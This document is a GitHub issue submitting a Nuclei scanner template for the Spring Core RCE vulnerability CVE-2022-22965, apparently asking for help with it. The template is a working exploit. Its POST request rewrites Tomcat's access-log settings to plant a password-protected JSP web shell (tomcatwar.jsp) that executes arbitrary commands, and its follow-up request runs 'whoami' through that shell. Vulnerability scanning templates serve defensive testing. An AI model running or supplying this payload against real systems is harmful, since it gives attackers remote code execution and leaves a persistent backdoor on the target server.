### ISSUE TITLE
Spring Core RCE (CVE-2022-22965) - help needed

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4013]
### Template Information:

https://github.com/craig/SpringCore0day

### Nuclei Template:

```yaml
id: Spring-Core-RCE

info:
  name: Spring Core RCE
  author: Akincibor
  severity: critical
  reference:
    - https://github.com/craig/SpringCore0day
  tags: rce

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Suffix: %>//
        c1: Runtime
        c2: <%
        DNT: 1
        Content-Type: application/x-www-form-urlencoded

        class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

      - |
        GET /tomcatwar.jsp?pwd=j&cmd=whoami HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200"
```
